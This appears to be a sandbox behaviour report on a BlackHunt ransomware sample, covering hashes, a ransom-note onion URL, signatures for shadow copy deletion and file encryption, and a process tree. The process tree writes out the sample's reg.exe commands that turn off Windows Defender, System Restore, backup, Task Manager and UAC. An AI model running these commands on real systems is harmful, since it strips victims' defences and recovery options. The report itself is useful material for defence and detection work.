Analysis
max time kernel: 150s
max time network: 125s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 18/01/2024, 22:27
Static task: static1
Behavioral task: behavioral1
  Sample: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
  Resource: win10v2004-20231215-en
General
Target: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe
Size: 707KB
MD5: 2fefd34de03404153a505291b8a0cceb
SHA1: bbd7c6d175567824a388e8d25378121c00aef233
SHA256: 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca
SHA512: 297d1a9cbaab8f23c172a31f9380e63195b7ed83353c654e49dc37734863bd95a2d592c0195f3e9749f1c834a6b8e6e2751195ac5261e02103879f0994b4deb9
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8nvnh:6uaTmkZJ+naie5OTamgEoKxLWavh
Malware Config
Extracted from: F:\#BlackHunt_ReadMe.hta (the dropped HTA ransom note)
Strings: http-equiv="x-ua-compatible" (an HTML meta attribute from the HTA markup, carried along by the config extractor; not an indicator)
URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
Deletes NTFS Change Journal (2 TTPs, 1 IoC)
The USN change journal is a persistent per-volume log of file changes kept on every NTFS volume (client and server alike); deleting it destroys the timeline an investigator would use to see which files the ransomware touched and when.
pid / Process: 1616 fsutil.exe
Modifies Windows Defender Real-time Protection settings
- Key created: \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)
UAC bypass
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe)
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
pid / Process: 2316 bcdedit.exe; 712 bcdedit.exe
Renames multiple (2707) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
(signature heading not captured in extraction)
pid / Process: 596 wbadmin.exe
Disables Task Manager via registry modification
Disables use of System Restore points (1 TTP)
Adds Run key to start application (2 TTPs, 1 IoC)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)
The Run value points at the .hta ransom note, not at the encryptor: at each logon the shell opens it through the HTA file association (mshta.exe), so this re-displays the note rather than re-running the payload.
(signature heading not captured in extraction; same IoC as the UAC bypass entry)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe)
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
- File opened (read-only) by 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe: \??\A: \??\B: \??\E: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (23 drive letters; C:, D: and F: are not in the list for the sample process)
- File opened (read-only) by vssadmin.exe: \??\F: (two events)
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc: 2 ip-api.com
Drops file in Program Files directory (64 IoCs)
All entries are by 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe. "created" entries are the ransom note (#BlackHunt_ReadMe.hta / .txt) and per-directory #BlackHunt_Private.key files; "modified" entries are existing files opened for writing (encryption).
- modified: C:\Program Files\Java\jre7\lib\zi\Indian\Mahe
- created: C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta
- created: C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.txt
- created: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#BlackHunt_ReadMe.hta
- created: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#BlackHunt_Private.key
- modified: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml
- modified: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt
- created: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720x480icongraphic.png
- modified: C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar
- modified: C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet
- modified: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png
- modified: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF
- modified: C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6
- modified: C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar
- modified: C:\Program Files\Java\jdk1.7.0_80\db\NOTICE
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar
- created: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#BlackHunt_ReadMe.hta
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar
- modified: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp
- created: C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png
- created: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_Private.key
- created: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#BlackHunt_Private.key
- modified: C:\Program Files\VideoLAN\VLC\skins\skin.catalog
- modified: C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pt_BR.jar
- modified: C:\Program Files\Java\jre7\lib\cmm\PYCC.pf
- created: C:\Program Files\Java\jre7\lib\images\#BlackHunt_ReadMe.hta
- modified: C:\Program Files\Java\jre7\lib\zi\Asia\Damascus
- modified: C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan
- modified: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png
- modified: C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html
- created: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.hta
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png
- modified: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\El_Salvador
- modified: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar
- modified: C:\Program Files\Java\jre7\lib\javafx.properties
- created: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_Private.key
- modified: C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf
- created: C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\#BlackHunt_Private.key
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar
- created: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\#BlackHunt_ReadMe.txt
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png
- modified: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar
- modified: C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer
- modified: C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo
- modified: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT
- modified: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid / Process: 1656 schtasks.exe
Interacts with shadow copies (2 TTPs, 5 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid / Process: 2588 vssadmin.exe; 3056 vssadmin.exe; 2664 vssadmin.exe; 2740 vssadmin.exe; 2480 vssadmin.exe
Modifies registry class (8 IoCs)
All by reg.exe. Together these register a ".Hunt2" extension and a "Hunt2" ProgID whose icon is the dropped #BlackHunt_Icon.ico, so encrypted files show the ransomware's icon in Explorer.
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\
- Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\
- Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"
Suspicious use of AdjustPrivilegeToken (13 IoCs)
- 2360 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
- 2760 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- 1048 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
The sample's SeBackup/SeRestore/SeTakeOwnership set is what lets it open and overwrite files it does not own. vssvc.exe (Volume Shadow Copy service) and wbengine.exe (Windows Backup engine) are system services; their appearance here corroborates the vssadmin.exe and wbadmin.exe invocations rather than being malicious themselves.
Suspicious use of WriteProcessMemory (64 IoCs)
Every event is the parent writing into a freshly created child (the standard CreateProcess pattern), collapsed here by target; "procid_target" is the sandbox's own process index.
Parent PID | Parent process | Target PID | procid_target | Events
2360 | 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe | 2696 | 29 | 4
2360 | (same) | 2692 | 136 | 4
2360 | (same) | 2872 | 33 | 4
2360 | (same) | 2884 | 34 | 4
2360 | (same) | 3036 | 127 | 4
2360 | (same) | 2720 | 39 | 4
2360 | (same) | 2316 | 149 | 4
2360 | (same) | 2748 | 42 | 4
2696 | cmd.exe | 2624 | 44 | 3
2360 | (same as above) | 2840 | 45 | 4
2360 | (same) | 3000 | 46 | 4
2360 | (same) | 1972 | 48 | 4
2360 | (same) | 2844 | 50 | 4
2360 | (same) | 2632 | 52 | 4
2360 | (same) | 2644 | 54 | 4
2360 | (same) | 2600 | 56 | 4
2360 | (same) | 2664 | 140 | 1
System policy modification (1 TTP, 3 IoCs)
All by 0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe, written through the registry API directly (no reg.exe child), so command-line-only telemetry will not see these.
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
EnableLUA = 0 turns UAC off at the next logon. EnableLinkedConnections = 1 makes drive letters mapped in the user's standard token visible to the elevated (linked) token, which is what lets an elevated encryptor reach mapped network shares that UAC-split admin sessions normally keep separate.
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe"C:\Users\Admin\AppData\Local\Temp\0a0db3f3f2b9c9a3f7d1d9fbbb937bdae3b0cc7d9d0d55efd8ada63a31243fca.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2316
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2864
-
-
-
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  depth 2, PID: 2748

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  depth 3, PID: 2156

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  depth 2, PID: 2840

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  depth 3, PID: 2012

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  depth 2, PID: 3000

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  depth 3, PID: 2900

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  depth 2, PID: 1972

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  depth 3, PID: 1604

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  depth 2, PID: 2844

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  depth 3, PID: 1984

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  depth 2, PID: 2632

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  depth 3, PID: 2332

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  depth 2, PID: 2644

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  depth 3, PID: 1656
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  depth 2, PID: 2600

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  depth 3, PID: 1036

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  depth 2, PID: 2664

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  depth 3, PID: 1820

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  depth 2, PID: 1484

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  depth 3, PID: 1048

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  depth 2, PID: 1940

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  depth 3, PID: 2520

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  depth 2, PID: 524

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  depth 3, PID: 2608

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  depth 2, PID: 472

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  depth 3, PID: 1968
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  depth 2, PID: 2944

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  depth 3, PID: 2828

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  depth 2, PID: 2676

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  depth 3, PID: 1932

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  depth 2, PID: 2908

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  depth 3, PID: 1612

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  depth 2, PID: 2984

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  depth 3, PID: 2124

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  depth 2, PID: 2996

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  depth 3, PID: 2008

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  depth 2, PID: 1160

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  depth 3, PID: 2140

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  depth 2, PID: 1272

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  depth 3, PID: 2692

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  depth 2, PID: 768

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  depth 3, PID: 2772

C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  depth 2, PID: 1520

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  depth 3, PID: 3036
C:\Windows\System32\cmd.exe
